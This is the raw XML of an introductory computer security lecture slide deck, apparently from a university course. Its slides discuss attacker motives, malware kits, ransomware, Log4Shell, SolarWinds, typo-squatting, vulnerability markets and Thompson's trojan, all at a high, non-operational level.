            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on infected page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Infects browsers that visit site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management console provides stats on infection rates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Sold for several 100$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Customer care can be purchased, one-year support contract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Impact:   500,000 infected sites   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(compromised via SQL injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="576"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several defenses:    e.g.  Google safe browsing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5B37C-0775-5F4A-9BAA-86D5C2DB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628650"/>
            <a:ext cx="4800600" cy="415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exploits used in attacks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46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3117276" y="2996227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2971800" y="1787324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4828856" y="2893792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3843032" y="111656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A43-EA69-9E48-B9AD-B3C4E103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2AD96-60A6-EA4E-9DBA-0EFDC7EB0FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4857750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570A7-F754-A649-8E90-21F8A28DE564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="836065"/>
            <a:ext cx="428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countries by share of attacked users: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0DC6C-7730-4E43-8487-3A8F1E16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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1333072"/>
            <a:ext cx="4800600" cy="33722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257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0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand exploit techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn to defend and prevent common exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand the available security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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>basics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(architecting for security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing apps, OS, and legacy code: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	sandboxing,  access control,  and security testing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2:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web security   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(defending against a web attacker)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Building robust web sites, understand the browser security model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3:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>network security   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(defending against a network attacker)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty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4:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>securing mobile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7871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1102519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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1073619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7154</TotalTime>
  <Words>2842</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>395</Paragraphs>
  <Slides>49</Slides>
  <Notes>25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Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>1_Lecture</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>3_Office Theme</vt:lpstr>
      <vt:lpstr>Computer Security</vt:lpstr>
      <vt:lpstr>Admin</vt:lpstr>
      <vt:lpstr>The computer security problem</vt:lpstr>
      <vt:lpstr>Top 10 products by total number of “distinct” vulnerabilities in 2022</vt:lpstr>
      <vt:lpstr>Distribution of exploits used in attacks</vt:lpstr>
      <vt:lpstr>A global problem</vt:lpstr>
      <vt:lpstr>Goals for this course</vt:lpstr>
      <vt:lpstr>This course</vt:lpstr>
      <vt:lpstr>Don’t try this at home !</vt:lpstr>
      <vt:lpstr>What motivates attackers?</vt:lpstr>
      <vt:lpstr>Why compromise end user machines?      1.  Steal user credentials</vt:lpstr>
      <vt:lpstr>Lots of financial malware</vt:lpstr>
      <vt:lpstr>Similar attacks on mobile devices</vt:lpstr>
      <vt:lpstr>Why own machines:     2. Ransomware</vt:lpstr>
      <vt:lpstr>WannaCry   ransomware</vt:lpstr>
      <vt:lpstr>Why own machines:     3. Bitcoin Mining</vt:lpstr>
      <vt:lpstr>Why compromise end user machines?        4.  IP address and bandwidth stealing</vt:lpstr>
      <vt:lpstr>More devastating: server-side attacks</vt:lpstr>
      <vt:lpstr>Result:  many server-side Breaches</vt:lpstr>
      <vt:lpstr>Case study 1:  Log4Shell     (2021)</vt:lpstr>
      <vt:lpstr>The result</vt:lpstr>
      <vt:lpstr>Case study 2:  SolarWinds Orion   (2020)</vt:lpstr>
      <vt:lpstr>Sunspot:  malware injection</vt:lpstr>
      <vt:lpstr>The fallout …</vt:lpstr>
      <vt:lpstr>Case study 3:  typo squatting</vt:lpstr>
      <vt:lpstr>Security considerations:  dependencies</vt:lpstr>
      <vt:lpstr>Security considerations:  typo-squatting</vt:lpstr>
      <vt:lpstr>The Marketplace for Vulnerabilities</vt:lpstr>
      <vt:lpstr>Marketplace for Vulnerabilities</vt:lpstr>
      <vt:lpstr>Google’s bug bounty program</vt:lpstr>
      <vt:lpstr>Marketplace for Vulnerabilities</vt:lpstr>
      <vt:lpstr>Marketplace for Vulnerabilities</vt:lpstr>
      <vt:lpstr>Marketplace for Vulnerabilities</vt:lpstr>
      <vt:lpstr>Temporary bounties</vt:lpstr>
      <vt:lpstr>Why buy 0days?</vt:lpstr>
      <vt:lpstr>Ken Thompson’s clever Trojan</vt:lpstr>
      <vt:lpstr>What code can we trust?</vt:lpstr>
      <vt:lpstr>Can we trust the compiler?</vt:lpstr>
      <vt:lpstr>What to do?</vt:lpstr>
      <vt:lpstr>Thompson’s clever backdoor</vt:lpstr>
      <vt:lpstr>Thompson’s clever backdoor</vt:lpstr>
      <vt:lpstr>What can we trust?</vt:lpstr>
      <vt:lpstr>So, what can we trust?</vt:lpstr>
      <vt:lpstr>THE  END</vt:lpstr>
      <vt:lpstr>Why compromise machines?       4. Spread to isolated systems </vt:lpstr>
      <vt:lpstr>Insider attacks:  example</vt:lpstr>
      <vt:lpstr>Data theft:  what is stolen  (2012-2015)</vt:lpstr>
      <vt:lpstr>How companies lose customer data</vt:lpstr>
      <vt:lpstr>Why compromise web sites:   (3) infect users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625</cp:revision>
  <cp:lastPrinted>2019-04-01T01:03:01Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-11-06T18:36:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-03T20:13:42Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>